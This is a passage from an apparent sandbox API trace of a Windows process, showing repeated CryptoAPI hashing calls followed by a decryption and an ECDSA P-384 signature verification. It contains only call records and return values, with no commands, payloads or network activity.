pbData=0x32e64aa0, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0179.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ed30 [0179.545] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.545] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0179.545] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.545] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.545] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0179.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6edc0 [0179.545] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.545] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.545] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0179.546] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.546] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0179.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ee20 [0179.546] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.546] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0179.546] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.547] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.547] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0179.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6eee0 [0179.547] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.547] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.547] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.547] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.547] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0179.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f6f0 [0179.548] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.548] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.548] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0179.548] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.548] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0179.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fab0 [0179.548] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.548] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0179.548] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.549] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.549] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0179.549] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f360 [0179.549] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.549] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.549] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.550] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.550] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0179.550] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f480 [0179.550] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.550] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.550] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0179.550] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.550] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0179.550] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f450 [0179.550] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.550] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0179.551] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.551] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.551] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0179.551] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fd50 [0179.551] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.551] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.551] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0179.552] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.552] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0179.552] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fd80 [0179.552] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.552] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0179.552] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.552] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.553] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0179.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ff30 [0179.553] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.553] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.553] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0179.553] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.553] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0179.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fae0 [0179.553] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.554] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0179.554] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0179.554] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.554] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0179.554] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fdb0 [0179.554] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.554] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0179.554] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0179.555] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.555] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0179.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f840 [0179.555] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.555] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0179.555] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.556] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.556] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0179.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f540 [0179.556] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.556] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.556] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.556] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.556] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0179.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f8a0 [0179.557] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.557] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.557] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.557] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.557] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0179.557] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f390 [0179.557] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.557] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.557] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0179.558] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.558] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0179.558] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fe70 [0179.558] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.558] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0179.558] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0179.559] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.559] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0179.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f720 [0179.559] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.559] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0179.559] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.559] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.559] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0179.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f660 [0179.560] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.560] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.560] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.560] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.560] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0179.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fd20 [0179.560] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.560] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.560] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.561] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.561] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0179.561] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fc30 [0179.561] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.561] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.561] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0179.562] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.562] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0179.562] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f600 [0179.562] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.562] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0179.562] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.562] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.562] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0179.562] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcc0 [0179.562] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.562] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.562] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0179.563] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.563] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0179.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f930 [0179.563] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.563] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0179.563] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.564] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.564] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0179.564] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f630 [0179.564] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.564] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.564] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.564] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.564] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0179.564] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f990 [0179.564] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.565] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.565] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.565] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.565] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0179.565] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.565] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.565] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0179.566] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.566] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0179.566] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.566] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0179.566] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.566] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.566] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0179.566] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.566] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.566] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.567] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.567] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0179.567] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.567] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.567] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.567] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.567] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0179.568] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.568] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.568] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.568] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.568] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0179.568] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.568] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.568] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0179.569] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.569] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0179.569] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.569] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0179.569] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.570] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.570] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0179.570] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.570] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.570] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.571] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.571] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0179.571] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.571] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.571] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338221d0) returned 1 [0179.572] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.572] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0179.572] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.572] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0179.572] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.572] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.572] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0179.572] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.572] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.576] CryptSetKeyParam (hKey=0x332b7a50, dwParam=0x4, pbData=0xcdfc4*=0x1, dwFlags=0x0) returned 1 [0179.576] CryptSetKeyParam (hKey=0x332b7a50, dwParam=0x1, pbData=0x32e6f960, dwFlags=0x0) returned 1 [0179.576] CryptDecrypt (in: hKey=0x332b7a50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e4fe60, pdwDataLen=0xcdfac | out: pbData=0x32e4fe60, pdwDataLen=0xcdfac) returned 1 [0179.576] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0179.576] CryptDestroyKey (hKey=0x332b7a50) returned 0 [0179.576] GetVersion () returned 0x295a000a [0179.576] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xcdf18, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xcdf18) returned 0x0 [0179.576] BCryptImportKeyPair (in: hAlgorithm=0x332a04f0, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xcdf10, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xcdf10) returned 0x0 [0179.576] BCryptGetProperty (in: hObject=0x337bbbd0, pszProperty="SignatureLength", pbOutput=0xcdf0c, cbOutput=0x4, pcbResult=0xcdf2c, dwFlags=0x0 | out: pbOutput=0xcdf0c, pcbResult=0xcdf2c) returned 0x0 [0179.576] BCryptVerifySignature (hKey=0x337bbbd0, pPaddingInfo=0x0, pbHash=0x32e41a50, cbHash=0x30, pbSignature=0x32e5006c, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0179.577] BCryptDestroyKey (in: hKey=0x337bbbd0 | out: hKey=0x337bbbd0) returned 0x0 [0179.577] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x332a04f0, dwFlags=0x0 | out: hAlgorithm=0x332a04f0) returned 0x0 [0179.577] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, 